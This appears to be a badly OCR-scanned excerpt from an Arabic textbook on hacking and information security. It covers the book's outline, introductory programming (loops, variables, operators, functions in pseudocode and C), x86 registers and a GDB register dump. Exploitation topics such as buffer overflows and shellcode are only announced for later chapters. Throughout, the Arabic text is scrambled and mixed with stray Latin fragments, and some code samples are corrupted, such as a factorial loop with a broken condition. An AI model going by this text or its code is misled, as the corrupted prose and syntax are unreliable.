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ستتعلم في هذا الكتاب مايلي: 

ae JI e‏ بلغة ال » وفهم وتحليل الأكواد البرمجية. 

9 شبکات الحاسب» وكيفية ig p‏ ال Sockets‏ وإنشاء الإتصالات بين الأنظمه. 

„Buffer Overflows إيجاد ثغرات في الأنظمه واستغلالها عن طريق هجیات ال‎ e 

.System Memory وال‎ Processor Registers لفحص ال‎ Debuggers استخدام ال‎ ۰ 

o‏ كيفية التحایل على آلیات الحايه الخاصة بأنظمة التشغیل» والحصول على صلاحیات ال system‏ أو ال root‏ على الأنظمه البعيدة. 


SAAN خوارزميات وأنظمة التشفير» وتحليلهاء وفهم تطبيقاتها‎ e 


نقوم في الباب الأول بِتَعَلّم قراءة وكتابة الأكواد البرجیه. ودراسة أنظمة التشغيل وطرّق تعاطيها مع البرامج» حیث ند الأساس لبقية 


الأبواب. 
في الباب الثاني ننتقل إلى de‏ الشبکات. c fed‏ على آليات وبروتوكولات الشبکات» وكيفية انتقال البيانات بين الأنظمة» بدءاً من ال 


Physical Layer JL +l, Application Layer‏ . سنتعلم في هذا الباب كيف tabs‏ ال Sockets‏ ودوال الشبكات في إنشاء قنوات 


الإتصال بين الأنظمه. 


في الباب الثالث نقوم بتسليط الضوء على عمليات الإختراق وتأمين الأنظمه» والتعمق أكثر في بيئة الشبكات, و تحلیل لیعض أنواع 


ees‏ پاستخدام ال «Debuggers‏ ونختم بإجراء اختبار اختراق عملي. 


Aad باستخدام خوارزميات التشفیر مَع دراسه‎ OLY لآليات تحقيق‎ uS e الباب الرابع ننتقل إلى علوم تشفير البيانات»‎ doe, 
من مكان لا خر.‎ BSI oll UD لتوفیر الموتوقية والمقصوضية وسلامة‎ ease CEST 
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What you need for this book 


هذا الكتاب Gato fa‏ على دراية بأساسيات الکمبیوتر العامة» وباكفاهيم الأساسية للشبکات کالتوفرة في منهج 


شهادة “Network+”‏ وبعض العرفة بأنظمّة التشغیل مثل Linux » Windows‏ 


Preface 
Lire ay eed gale to Nie Al eal بلط‎ pe الکتاب‎ Dd 
Computer ال‎ 3 x الإختراق أو تأمين البيانات والانظمق فنحن بحاجة للإلمام بعدة أمور تحضيرية» تبدأ‎ 
والفهم الجيد لبروتوكولات الشبكات وتكنولوجيا التشفير»‎ «(Linux و‎ Windows) وأنظمة التشغيل‎ Architecture 
.Python كال‎ Scripting language و‎ <C ال‎ ixl iz JI وبعض لغات‎ 
Computer ومبادئ ال‎ i£ JI يتدرج الكتاب في تناول هذه الأمور بشکل هرمي يبدأ بتبسيط أساسيات‎ 
للقارئ» حيث تعد الأساس لبقية الابواب» ثم ينتقل إلى علوم الشبكات وآلية انتقال البيانات بين‎ Architecture 
الإختراق والحاية» ويختم بعلوم التشفير اللازمة لتحقيق‎ OUT الأنظمة» ثم يتعمق آکثر ليبدأ بشرح وتحليل‎ 
الخصوصية والسلامة والموثوقية.‎ 
تم إعداد موضوعات الكتاب بحيث تكون مُعتمدة على بعضها بشكل تسلسلي» لكن بإمكانك التنقل كا تشاء داخل‎ 
بالأساسيات المطلوبة.‎ UG الكتاب إذا كنت‎ 
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Part I 
Programming 


While (sleepy)! | 
fillcup (); 


drinkCoffee ()! 
} 


Programming 


[n] 


Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلوماءه‎ 
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Introduction 


Col‏ أن أبدأ بمقولة أعجبتني.. عبارة عن أحد التعريفات التي تُصحّح مفهوم القرصنة عند الكثير!: 

“Hacker is a term for both those who write code, and those who exploit it!” 
BY على الرغم من اختلاف أهداف كل منهم إلا أنهم في النهاية لديم نفس التكنيك في التغلب على الشاکل!»‎ 
على اكتشاف الأخطاء البرمجية والثغرات الأمنية»‎ Sae ed پُرید التحايّل على الأنظمة»‎ ob مهم‎ Ae I ببساطة.. فَهُم‎ 
وعلى الجانب الآخر.. الفهم لسبب حدوث هذا الاختراق (الثغرة نفسها أو الخطأ البرمجي) سينفع البرمح أو مُصمّم‎ 
الأساسي‎ b ÉJ هو‎ igl pol أكثر حتى يتفحص أكواده و إعدادات الأجهزة لديه. وبا‎ Al y النظام الأمني‎ 
الأساسيات التي‎ uae BL الأنظمة والبروتوكولات» فسوف نبدأ بشّرح‎ os تسیر الأمور‎ GS حتی تفهم‎ 


متخا جها يخضن النظر عن ما كنت تحب ple‏ لا!. 


هيا لنبدأ رحلتنا.. 

البرنامج هو عبارة عن مجموعة من LEV‏ أو Ja‏ مکتوبة بلغة مُعينة» في الواقع ليست البرامج فحسب! فهناك 
آمور كثيرة حولنا مبنية على مفهوم البرجة مثلاً قيادتك للسيارة تُعد من الأمور AL‏ مُسبقاً HS‏ باتباعك خطوات 
ue‏ عند القبادة» [x‏ وصفات الطبخ» Ll,‏ رياضة القدم» يتحقق فيها المدف بحدوث مجموعة من 


الاحتمالات. تنتهي بوضع الكرة داخل الشبكة. 


هذا ماز !وة إلى الكمصيوتر:. 
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من البدهي أنه كي نجعل الكمبيوتر يقوم بشيء ما فعلينا أن نکتب له ال dee dab Instructions‏ وهي 
ال «Machine Language‏ لكنها صعبة الفهم!.. PS‏ عبارة عن Bits, and Bytes‏ وتختلف من Architecture‏ 
لآخر. ولكي نتغلب على أزمة الكتابه Machine LanguageJL‏ ظهر UJ‏ ال Assembler‏ وهو عبارة عن Translator‏ 
يقوم Assembly Instructions! äis A‏ الى ال Machine Language‏ تعد ix]‏ ال Assembly‏ أسط من 
ال «Machine‏ فهي تستخدم کلات وعناوین مفهومة بعکس ال Machine‏ التي تتكون من أرقام فقط!. لكنها تتشابه 


مع ال Machine‏ في YI‏ تختلف Gb Gal‏ نوع ال „Architecture‏ 


lise‏ أننا بحاجة إلى Translator‏ للتحویل من ال Assembly‏ إلى ال «Machine Language‏ وهی اللغة التى 
يستطيع ال CPU‏ أن یَهَمها.. والآن هل سنكتب الأكواد بال «Assembly‏ سَیکون الأمر Lee‏ أيضاً!ء تن 
بحاجة إلى Translator‏ من نوع آخر لیترجم SS ud‏ من أكواد بلغات مثل لُغات ال C, C++‏ إلى ال Machine‏ 


Compiler هو ال‎ Translator سيكون ال‎ LS.. «Language 


Processor Architecture وبناء على نوع ال‎ JW as الأكواد بلغة ال © إلى‎ ie 4 Compiler يقوم ال‎ NS 
Ld Hacker لأنه الأساس لنجاح البرنامج!ء ولكن ال‎ Source Code بال‎ cse Jl اهتمام‎ Ado الوجود وهذا‎ 
و بالفحص الحيد لكيفية تعامل‎ «CPU الطاف مع ال‎ xe هو الذي سيتعامل في‎ Compiled Program أن ال‎ ~ 
حينها‎ isi Application مع هذا البرنامج» ریا يتمكن من اكتشاف ثغرة في البرنامج أو ال‎ Memory وال‎ CPUUI 
لأماكن أخرى داخل ال‎ execution flow إلى محاولة توجيه ال‎ crash له ورب| يقوده هذا ال‎ crash من إحداث‎ 
من استی‌ال‎ as بتنفيذها‎ CPU لیقوم ال‎ «shellcode تسمیها‎ instructions حيث يضع مها جموعة من ال‎ memory 


تنفيذ البرنامج !. 
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يؤكد على هذا الأمر السيد "Dave Aitel"‏ ذه العبارة: 


“Hacking is not reverse engineering!, your goal is not to come up with original source code for 
the application!, your goal is to have a greater understanding of the program or system than the 
people who built it". 


تم تطوير تقنيات أمنية ce e‏ التلاعب cos‏ منها «SafeSEH‏ وال Nonexecutable Stack‏ أو ال 
(Randomized Stack Space‏ وقامت مايكروسوفت بتطوير تقنية شهيرة.. هي “DEP”‏ وغيرها من التقنيات 
الأمنية التي سيجري مُناقشتها لاحقاً في الباب الثالث بإذن الله. 

هذا رائع!.. ولكن ماذا سَتٌستفيد من XX)‏ ال Assembly‏ .€( إذا US‏ فقط سَتَستَخدِم ال 3d Compiler‏ 3€ ماثرید إلى 
ال Machine Language‏ وينتهي الأمر!. 


نعم.. هذا منطقى» ولكن دعني أوضح بعض الخصائص XXI‏ ال Assembly‏ والتی سَتَجعلك تَعى وحدّك أهميتها. 


"Machine Language Instructions"Jl جين لاستعراض‎ E يستخدمها‎ i u^ po Assembly ال‎ "= 
CPU التي تم إعطاؤها إلى ال‎ 

=" ال Assembly‏ تتعامل بعلاقة One-to-One‏ مع ال «Machine Language‏ بمعنى أنه Instruction JN‏ 
بلغة ال Machine‏ یقابلها Instruction‏ بلغة ال Assembly‏ يوضحة بطريقة آسهل لتفهم CAS‏ یتعامل ال 
ae [al CPU‏ البرنامج الذي یِعمّل عليه!ء وكمثال.. "Oxc3"‏ أو 11000011 بلغة الآلة able‏ بال 


(return) (gas "ret" هذه الكّلمّة:‎ Assembly 
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وكيف تُطبق هذا الأمر؟ 
هنا تستخدم ها uri‏ بال Disassembler‏ والذي يقوم بإعادة ترجمة ال Machine Language‏ إلى لغة ال Assembly‏ 


كي pe‏ الفهم والتحليل. 


Malware Author Malware Analyst 


ns 5 AE i i. 
High-Level Language Low-Level Language or لك‎ (ue تامل متي هده الصورة‎ 


push ebp 5 الأمر.‎ 


move ebp, esp 


int c; 
printf("Hello.\n"); 


exit(0); sub esp, 0x40 


هذه الصورة توضح UJ‏ مايقوم به کل من ال 


malware author‏ حيث يكتب أكواده بلغه 


CPU 


Compiler Machine Code Disassembler malware يتركز عمل ال‎ lew «€ مثل ال‎ 


a ke في فحص وتدقیق ال‎ analyst 


8B EC 40 


software behavior أو ال‎ instructions 


باستخدام ال Hex Auditors‏ كال IDA Pro‏ وغيرها. 


ا من هذا الشكل هو التركيز على وظيفة کل من ال Compiler‏ و ال .Disassembler‏ 


إلى هّنا نكون وصلنا لنهاية هذه doll‏ والتى كان هدفها تحفيزك لإدراك أهمية ال Me‏ هل أدركت ذلك؟» جيد!.. 


هيا إذاً لنبدأ بشرح أساسيات البرجة JUS‏ ©. 
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Control Structures 


من الطبيعي OT‏ البرنامج يتكون من ja 4 jas‏ ال Instructions‏ التي يتم تنفيذها delg‏ ولكن ما العمل إذا ظهرت 
بعض الخيارات أو العقبات أثناء التعامل مع الستّخدم؟ لتضرب مثال من واقع الحياة» ol‏ أثناء قيادتك للسیارته 
يُمكِنْك تفعيل ال GPS‏ فيقوم بِرَسْم مسار 232 AGE JU‏ ولكن إذا مرت في طريق خاطئ أو وجدت أحد الشوارع 
مسدوده فسيقوم ال GPS‏ بتغيير ال Route‏ على الفورا؛ Sod‏ أيضاً نستخدم نفس التكنيك SES BG‏ بحط 
ji‏ ال Instructions‏ وفقاً لما 55 ولا یقتضیه الوقف. سنتكلم عن بعض ال Statements‏ التي تقوم بعمل ال 
qal U "Control"‏ بتطبيق مثال قيادة السياره. 


If-Then-Else 


Gols (Pop "‏ تواجد بعض الإصلاحات في الشارع (Condition)‏ 


«(Then) (3) "‏ سنقوم بتنفيذ بعض ال Instructions‏ لتفادي هذا العائق!.. 


و 


* غير ذلك (Else)‏ قم باستکمال سيرك طالا لم SLs‏ الإصلاحات (Condition)‏ 


If (condition) then 


1 


Set of instructions to execute if the condition is met; 

} 

Else 

{ 

Set of instruction to execute if the condition is not met; 


} 
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While/Until Loop 


اشا یرید c^ ali‏ تنفيذ مجموعة من ال Instructions‏ أكثر من مرة!» وستحتاج أن تضع له ال Condition‏ التى 
سيقوم بناء عليها بتنفيذ التكرار. 

لنأخذ هذا المثال: 

"إن أصابك الجوع» إذهب واحصل على الطعام ثم التهمة".. ينتهي القوس الثاني ()) فيعود ال Pointer‏ إلى البداية 
فيتحقق من الشرط مرة أخرى.. هل لازلت جائع؟ ..لا!» إذا CES‏ خارج الدالة. 


Vhile (you are hungry) 
1 
Find some food; 
Eat the food; 


} 


والآن.. هل فهمت دلالة الكود المكتوب على الكوب الموجود في صفحة عنوان هذا الباب؟. 
دالة Until‏ هی نفس ال While‏ ولكن بشرط معکوس!. أي أنه: 


Until (you are not hungry) 
{ 
Find some food; 
Eat the food; 


) 
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For Loop 


نستخدمها La‏ عند الحاجه لتكرار شیء ما لِعَدَد من الزات. كأنْ تخبر البرنامج بالقيام Be‏ خطوات؛ هذه الخطوات 
سیگررها لعَدّد من الَرّات سَنخبره بها. وبعد انتهاء عدد المرات سيقوم بالخروج من الداله. مايل مثال لتوضيح هذه 
الدالة» عباره عن كود يُعطي الأمر لقيادة الركبة AL BLL‏ كيلو مترات. سَنقوم بتطبيقه باستخدام كل من While‏ و 


.For 


For (5 iterations) 
Drive straight for 1 mile; 


LA‏ ستقوم بقيادة السياره يساق ميل واحدء تم تقوم بالسير ليل GAT‏ ثم ميل الث» وهکذا إلى أن تصل إلى الیل 
ا تاش 
هذا شکل الدالة بلّغة ال :C‏ 


For (i20; i«5; i++) 
Drive straight for 1 mile; 


سنشاهد معاً كيف نقرأ هذا الکود لأنه سيتكرر كثيراً لاحقاً.. 
ENG,‏ بقيمة (0 = 1) ثم تقود لسافة ميل واحدء فتزداد قيمة أ بواحده فيكون (1 = )» ثم تُقارنه بالرقم 5» هل هو 
آصغر؟ نعم!ء اذهب لتقود مسافة ميل آخرء ثم قم بتنفيذ ++أ فيكون (2 = (i‏ والآن قارنة بالرقم 5 ثم عد BLAU‏ 


استمر إلى أن تكون قيمة أ تساوي 5( فثقارنها بالشرط (5 > 1) فنجد أنه لم يتحقق!» فنخرج خارج الدالة. 
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والآن سنطبّق نفس الشرط باستخدام While‏ 


Set the counter to 0; 

While (the counter is less than 5) 
1 

Drive straight for 1 mile; 

Add 1 to the counter; 

} 


هنا سنقوم بتصفير العداد )0( ثم القيادة لسافة ميل واحدء وزيادة العداد بقيمة واحد ليصبح (1) ثم العودة للدالة 
ومقارنة الرقم ب 5 فنجد أنه أقل» فنعود للسير بمسافة ميل آخر وزيادة العداد ليصبح (2) وهكذا حتى الوصول 
للرقم (4) فتكون النهاية. 


Variables 


المتغير هو عبارة عن إناء ES‏ أن eed‏ بداخله قِيمّة WN ESIA‏ من تحديد نوع المتخير قبل استخدامه هذا مُشابه 
لزجاجات المشروبات والعصائر! نستطيع مییزها بوجود الكتابة أو الصور AAi‏ عليها. هذا المتغير ربا لا حتفظ 
بهذه القيمة بداخله الى الأبدء يُمكننا تخییرهاء أو BLAYI‏ عليهاء أو تَطْرّح منهاء فتم إطلاق عليه لفظة "متغير". مايل 
تعريفه الموجز باللغه الإنجليزية: 

“An object that holds data that can be changed” 

برجي يجب علينا أن 355 اسم Ka‏ ونُحَدّد توعه (declare your Variable)‏ ما ]15 كان سيحوي > 6 أو أرقام 


مثلاً. يجب أن يتم ذلك قبل أن تقوم باستخدامه داخل برناجك» كا الخال مع وصفات Geb‏ فنحن حرف Js‏ 
Gel sly klb usui‏ قبل الشروع بالطهي. 
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هذه المتغيرات يقوم الجهاز بتخزينها في مكانٍ ما داخل ال «Memory‏ سنتكلم عن هذه الأماكن بالتفصيل فيم| بعد. 


مايل بعض آنواع ال :variables‏ 


int (integer values) 
float (decimal floating) 
char (single character values) 


£t x < 2 © z EA 
Ae y ليستوعب عدد‎ object أي أن كلاهم سيكون‎ int) وقمنا بتحديد توعیهیا‎ D هنا نقوم بتعریف مُتغيرين  و‎ 
بعد» عدد صَحيح.‎ 43 5 Y "Integer" 


int a, b; 


يتأخذ مثال بسیط: 


int a = 13, b; 
float k; 
char Z = 'A'; 


" 


قمنا LÅ‏ بتعريف مُتغير a‏ وحددنا ما بداخله مُسبقاً! وهو الرقم 13.. ثم حَددنا مُتغير آخر ub‏ نوعه "عدد صحيح 
ولکن d‏ تُحدد ما سَیحویه بداخله.. ثم عرفنا مُتغير آخر k‏ نوعه "عدد عشري" ثم متغير آخر 2 سيحوي بداخله 
حرف واحد هو ۸.. وبعدها حددنا القيمة التي نود وضعها داخل المتغير k‏ وهي 3.14.. ّم قمنا بإجراء تغيير للمُتغير 


Z‏ من جديد حيث استبدلنا ما بداخله» وهو الحرف A‏ ووضعنا بدلاً منه حرف آخر هو .. تم أخير أخبرنا 


صدیقنا D ax‏ آنه سَیخزّن alla‏ فيمة التغر 2 وهی 13 زاداً علیها عدد 5.. 
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وبالتالي ستكون قيمة b‏ النهاية 18 © 
سننتقل الآن لتوضيح بعض ال Operators‏ ال 


Arithmetic Operators 


Operation Symbol Example 
Addition + b=a + 5 
Subtraction - b=a-5 
Multiplication * b =a * 5 
Division / b=a/5 
Modulo reduction % b=a&%5 


سَنقوم بتوضيح ال "Mod"‏ وهو القيمة التبقية بعد إجراء عملية القِسمّة» وگوثال لتفرض مُتغير 8-13 وأردنا 


القسمة على 5 فيكون الناتج 2 ويتبقى من الرقم 13 بعد عملية القسمة هذه قيمة.. هي (3). 
)3 = 13%5( 


نستخدم أيضا بعض الاختصارات (Shorthand Expressions)‏ في بعض الدوال مثل تلك المستخدمة في دالة ال For‏ 


5 j++ ۳ دو‎ 
Full Expression Shorthand Explanation 
i-2i-41 i++ or cti Add 1 to the variable 
j^ sme ua i-- or --i Subtract 1 from the variable 


وعنلما ex‏ استخدام هذه العلاقات مع ال Arithmetic Operators‏ فتختلف النواتج تبعاً ينوع الاختصار المستخدم. 
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مثال: 


ماذا سيحوي WS‏ من ۵ و Sb‏ 


نعم.. سيكون الناتج كالتالي: 
bo 30‏ 
a= 6‏ 


لماذا؟ 


att oY‏ تعني آننا تخیر البرنامج بإضافة 1 إإلى قيمة المتغير ۵ ولكن "بعد" إتمام العملية الحسابية!. 


; لنستعرض مثال آخر: 


وهذا يعني أنه ستزداد قيمة al‏ ۵ "قبل" إجراء aas‏ الضرب!: 


وبالتالي تكون قيمة b‏ في النهاية = ۰36 ويكون (6 (a=‏ 


هذا رائع» KS..‏ أيضاً كنوع من الإختصار إضافة قيمة مُعينة pach‏ ماه فيقوم بإجراء الجمع والإحتفاظ بالناتج 


النهائي بداخله في نفس الوقت!» يتم استخدامها كثيراً في الأكواد. 
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Full Expression 


i = i + 12 
i-i- 12 
i = i * 12 
1 = i 12 


Shorthand Explanation 


i+=1 


i-=12 
|2 
i/=12 


i*-] 


2 


Add some value to the variable. 
Subtract some value from the variable. 
Multiply some value by the variable. 
Divide some value from the variable. 


Comparison Operators 


Condition Symbol 
Less than « 
Greater than > 

Less than or 

equal to <= 
Greater than or 

equal to >= 
Equal to == 

Not equal to I= 


Example 
(a < b) 
(a > b) 
(a <= b) 
(a >= b) 
(a == b) 
(a t=) 


عند (a = US‏ على سبيل UN‏ فَتَحنُ تعني.. ضع قيمة 5 داخل ell‏ .. بيغا عندما نکتب )5 (a=‏ فنحن 
نطلب من البرنامج GEREN‏ من القيمة التي يحملها الْتغیر 2 ما إذا كانت 5 أم لا. هناك symbol‏ آخر يُمكن استخدامه 


بمفرده قبل ال condition‏ وهو ال )!( ويعنى "Not"‏ کمایل: 


!(a < b) is equivalent to (a >= b) 


Logic Symbol 
OR | | 
AND && 


Example 
((a < b) 


|| (a« c 
((a > b) && ! ) 


) 
de ce) 
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في المثال الأول: Ss‏ هنا ترید تحقيق (el‏ من الشّرطَين الأول أو الثاني.. فتكون النتيجه True‏ وفي EM‏ الثاني: سيكون 
الناتج True‏ فقط إذا تحقق الشرطين معاً.. وهو أن تكون قيمة a‏ أصغر من قيمة b‏ وفي نفس الوقت لا تقل قيمة a‏ عن 


قيمة ©. 


هذا المثال يوضح العلاقة أيضاً: 


While ((hungry) && !(cat present)) 
{ 

Find some food; 
If(!(food is on a mousetrap)) 
Eat the food; 


هل Sis‏ دالة {While‏ 
Gas‏ هنا بوضع شرطين لحدوثهاء وهما: جوع الفأر» وغیاب القط. فسيبحث عن قطعة الحبن» ثم تم فتح شرط آخر 
وهو أن تكون قطعة الجبن هذه can‏ بمّصيدة الفتران حينها قم بالتهامها. EKo‏ أيضاً التعبير عَن حُدُوث الجوع 

بالصيغة )1== While (hungry‏ لأن البرنامج يرى أن القيمة 0 تعني False‏ والقيمة 1 تعني True‏ 


Functions 


بعد أن انتهينا من هذه الاساسیات. سننتقل الآن إلى ال Functions‏ 
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أحياناً يود qa nll‏ استخدام مجموعة معينة من ال Instructions‏ ليقوم بتنفيذها في أكثر من مَوضع» فمثلاً إذا فرضنا 
آننا قمنا OLS‏ جموعة أسطر برمجية تقوم بإنشاء قناة اتصال ب Server‏ حدد وبطريقة معينة» فاذا LS‏ نكتب برنامج 
طويل» وأرذنا أن نتصل بهذا السيرفر في عدة مواضع داخل الکود» فليس من الحكمة تكرار هذه الأسطر كل مرة 
نحتاج فیها لإنشاء الاتصال UK‏ وضعهم à‏ شيء أشبه ب Sub-Program‏ پسمی ."Function"‏ وکلا اردنا 
إنشاء الاتصال اكتفينا بكتابة عنوان هذه ال Function‏ فقط لتوفير الجهد. 

لنأخذ مثال واقعي Gea‏ عليه: 

لنفرض أنك تسیر بسيارتك في أحد الشوارع ثم تصادف مُفترق بعد قلیل» وتود أن تحدد ما إذا كنت ستتجه إلى اليمين 
أو إلى اليسار!ء سنقوم هنا بكتابة Function‏ تطلق علیها Function Turn‏ آي آننا opes‏ لك مجموعة من التفاصیل 
التي سوف يتم اتباعها عند رغبتك بتغيير مسارك!ء ولكننا سنستخدم ميزة برمجية وهي أننا سنترك لك القرار في أن 
تحدد الاتجاه فيا اذا كنت ستتجه إلى اليمين أم الى اليسار. سنعتبر الاتجاه في حد ذاته scia Variable‏ 


Al variable, direction‏ أن $54 آنت gd‏ تقوم ال Turn()‏ بإجراء عملها bly‏ عليه 


ستقوم ال Function‏ بتنفيذ الاق: 
" تشغيل ضوء الإشارة اليمنى أو الیسری حسب الإتجاه المراد الانتقال إليه (Activate Blinker)‏ 


" تبداً السيارة بالتباطیم (Slow down)‏ 


" سنقوم بتفحص حركة المرور في الحارة التى سندخل إليها! (Check for oncoming traffic)‏ 
هذا مثال یوضح عمل هذه ال :function‏ 
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Function Turn (variable direction) 


{ 


Activate the variable direction blinker; 
Slow down; 

Check for oncoming traffic; 
while (there is oncoming traffic) 

{ 

Stop; 

Watch for oncoming traffic; 

} 
Turn the steering wheel to the variable direction; 
while (turn is not complete) 

{ 

if (speed < 5 mph) 

Accelerate; 


} 
Turn the steering wheel back to the original position; 
Turn off the variable direction blinker; 


لاحظ أن المَوْس الأول (الخارجي) e$‏ قتحه في البداية وغلقه في النهاية» وجميع الأحداث تت بينهما.. استخدمنا دالة 
aá While‏ شّرط ede‏ الدخول إلى ا حارة في حالة گونها مُزدحة.. 

45.5 التالية وهي دوران المقُود إلى الاتجاه الراد (تم‎ Instruction إلى ال‎ pointer تكن کذلك. قَسَيتتقِل ال‎ Í ob 
أن تكون على سرعة كافية للقيام بالدوران والاندماج‎ AN كمُتغير)» تم وَضَعنا شرط آخر وهو أن السيارة نفسها‎ 
tolli y مقوّد السيارة لِوَضعِه الطبيعي‎ ee eio ثم حرجنا‎ if وداخلها دالة‎ Whlie بالحارة فاستخدمنا دالتين معاً..‎ 


مصباح الاشارق e‏ الحروج من ال doe Function‏ 
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في i‏ ال ode C‏ استدعاء لل lac, Function‏ أداء عَمَلِهاء Lo)‏ أن تقوم بإرجاع ناتج أو قيمة ما نا أو oh‏ قام 
پاستدعائها (functions can return a value to a caller)‏ وربا Y‏ جع لنا شیء!» و all‏ على ال function‏ التى 
لا ثرجع لنا قيمة بعد انتهاء عملها بال Ul. void)‏ في حالة إرجاع ال function‏ قيمة Le)‏ انتهاء عمَلها تقوم بالإشارة 


p dl‏ الذي سَتضع فيه ال function‏ هذا ال e «return value‏ توضيح ال Data type‏ الخاص به.. 


كيف ذلك؟ 


مايلٍ function‏ اسمها ( factorial(‏ نقوم باستدعائها لإجراء عملية رياضية على Adi‏ 2 وبعد انتهائها eo‏ لنا 
dis UR T‏ 
قيمة تقوم بوضعها في المتغير b‏ 


int a-5, b; 
b = factorial (a); 


تقوم في هذا الكود بتعریف مُتغيرين بنوع cint‏ ثم أخبرنا المتغيرط أنه سيحوي قيمة» ستكون بالطبع sint‏ وهذا يعني أن 
ال return value‏ القادم من ال ( factorial(‏ سيكون نوعه integer‏ , ووضعنا قيمة a pee‏ "بخمسة» سیکون (a)‏ 
هنا هو ال Argument‏ الذي يتم إمرارة إلى هذه ال function‏ بمعنی LÍ‏ ستدخل الرقم 5 لاجراء العَمَلية الحسابية 


هاهی ال ( factorial(‏ التى قمنا باستدعائها: 
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int factorial (int x) 


1 


Jt 33 
for (i21; i > x; i++) 
x *= i; 


return x; 


} 


لاحظ ol‏ قيمة × تم تركها تبعاً للرقم Jai‏ وهو في حالتنا 5 وتم تحديد ال data type‏ أنه (à integer‏ النهاية 
سيحوي yadi‏ 9 قيمة هی )120 = 5*4*3*2*1( 

سأشرح لك بالتفصيل كيف تم ze‏ "استدعاء ال "function‏ في الباب الثالث بإذن الله. 

EX.‏ أن ال Function‏ التى لا ej‏ نا قيمة مُعينة "return value"‏ وهي التي تستدعيها لتقوم بوظيفةٍ ما فقط بال 
."Void Function"‏ إذا Lee‏ للوثال الخاص بقيادة السيارة الماضي» لاحظ أننا استدعينا ال ) Turn. Function(‏ لتقوم 
بعملية الدخول للحارة فقط» فنحن لسنا بانتظار return value‏ منهاء لأننا hä‏ 3$ تنفيذ مجموعة من ال 


05 بدون الاضطرار لكتابتهم كل مّرة قبل الدخول n‏ حارة!. 


سَنَحْتِم ذا المثال فقرة ال :functions‏ 


void turn (variable direction, target street name) 


1 


Look for a street sign; 
current intersection name = read street sign name; 
while (current intersection name !- target street name) 


{ 


Look for another street sign; 

current intersection name = read street sign name; 
} 
Activate the variable direction blinker; 

Slow down; 
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Check for oncoming traffic; 
while (there is oncoming traffic) 
1 

Stop; 

Watch for oncoming traffic; 

} 
Turn the steering wheel to the variable direction; 
while(turn is not complete) 

{ 

if(speed < 5 mph) 

Accelerate; 


} 
Turn the steering wheel right back to the original position; 
Turn off the variable direction blinker; 


ولكي تكون ال Function‏ أكثر واقعية.. ~ إضافة “Argument”‏ أو "target. street, name" pe‏ وهو اسم 
الشارع ce» ERU‏ الیه» بجانب ال Argument‏ الأول "variable direction"‏ والآن ق الإستفادة من هذه 


FORT في الوقت‎ function ال‎ | £355 B للسيارة‎ eU s KS ol function ال‎ 


Begin going East on Main Street; 


if (street is blocked) 
{ 


Turn (right, 15th Street); 
Turn (left, Pine Street); 
Turn (right, 16th Street); 


} 
else 
Turn (right, 16th Street); 


Turn (left, Destination Road); 
for (i20; i«5; itt) 
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Drive straight for 1 mile; 


Stop at 740 Destination Road; 


Turn() قمنا باستدعاء‎ Gl ELEY هل‎ 


قمنا أيضا بإمرار ال Arguments‏ إليها e‏ وضع کل منهم مكان ال buh variable‏ له وتنفيذ المطلوبء ولن ننتظر 


“void function" LN منها‎ return value 


سننتقل الآن إلى موضوع تلف قليلاً ثم تعود إلى iE I‏ من جدید.. سنتعرف على a)‏ ال Registers‏ التي 
يُستخدمها ال CPU‏ أثناء تعامّلهِ مع البرامج . 


x66 Processor 


سَتأخذ فاصل قصير لتُشاهد بعض الأمور zai‏ بال G id x86 processor‏ على 228 CPUS! Jalas‏ مع ال 
..Compiled Program‏ يَمتَلك ال Processor‏ مجموعة من ال Registers‏ . فهو xu‏ يُستخدمهم ك internal variables‏ 
يُوظّفهم بشكل دقيق PEY‏ مهامه المختلفة. 


نعم ولكن ماذا نعنى Register JL‏ ..* 


إنها مساحة oy‏ صغيرة داخل ال CPU‏ وعد آسرع طريقة یستخدمها للوصول والتعامل مع ال Data‏ 
Cue !‏ ی س C T‏ 


A small amount of storage on the CPU and is the fastest method for a CPU to access data. 
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كك رؤية الكثير من التفاصيلء (S‏ يمكنك الوقوف داخل ال Compiled Program‏ ومراقبة ال memory‏ 


الو اع وتری بعيتيك آوضاع ال Registers‏ أثناء الرنامح» Us|‏ وظيفة ال ."Debugger"‏ 
برنامجك وتری بعيتيك أوضاع برنامج» ابا bs‏ 


ما هذا ال *..Debugger‏ 

eaa + des‏ الكيميائي الیکرسکوب لفحص العینات يُقوم qe oll‏ باستخدام الميكرسكوب XS Lad‏ سیتفحص 
به AER ael y‏ الوقوف على أي سطر برجي تُرِيدُه ومُراقبة tab‏ على ا لجهازء كا يُمكثك تغيير al‏ والتغيرات.. 
وغيرها من الامور الشيقة!. 

سنقوم في الباب الثالث بإذن الله باستخدام ال Debugger"‏ 8 مع أحد البرامج وفحص ال Registers‏ 
USL‏ واستخراج بعض الأخطاء البرمجية واستغلالها في اختراق البرنامج!. a‏ سنكتفي حالياً بشرح بعض 
الأساسيات المتعلقة بال .Registers‏ 

main( ) عند ال‎ Breakpoint JR ونقوم‎ GDB debugger فتحه باستخدام‎ e c^ بوضع مثال‎ qoe 
قرائته في البرنامج.. ولکن‎ ex هي أول ما‎ main() أثناء تشغیل البرنامج. لاحظ أن ال‎ Registers لنشاهد وضع ال‎ 
us 


*..Breakpoint ماذا نستفيد من هذا ال‎ 
"it gives you the ability to halt a process that is being debugged" 


*. process لل‎ halt Jor ولماذا نقوم‎ 


By halting a process, you are able to inspect variables, stack arguments, and memory locations. 
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reader@hacking:~/booksre $ gdb -q ./a.out 
Using host libthread db library 
"/lib/tls/i686/cmov/libthread db.so.l1". 
(gdb) break main 


Breakpoint 1 at 0x804837a 
(gdb) run 
Starting program: /home/reader/booksrc/a.out 
Breakpoint 1, 0x0804837a in main () 


(gdb) info registers 

eax Oxbffff894 -1073743724 
ecx 0x48e0fe81 1222704769 
edx 0x1 11 

ebx 02107 ۶ 6۴ ۴ 4 -1208127500 
esp Oxbffff800 Oxbffff800 
ebp Oxbffff808 Oxbffff808 
esi Oxb8000ce0 -1207956256 
edi 0x0 0 

eip 0x804837a 0x804837a «main-*6» 
eflags 0x286 [ PF SF IF ] 

cs 0x73 115 

SS Ox7b 123 

ds Ox7b 123 

es Ox7b 123 

fs 0x0 0 

gs 0x33. 51. 


لاحظ آول أربعة Registers‏ ظه روا عند بداية «qot JI Joe‏ هم عل الترتیب: 
(EAX, ECX, EDX, and EBX)‏ 


۰ po w R a i "EK 
"temporary variables" يُعتبروا‎ er! أهمها‎ ciae. في آمور‎ CPU یستخدمهم ال‎ General Registers عليهم‎ pU 


یستخدمهم ال CPU‏ أثناء تنفيذه لل Instructions‏ 
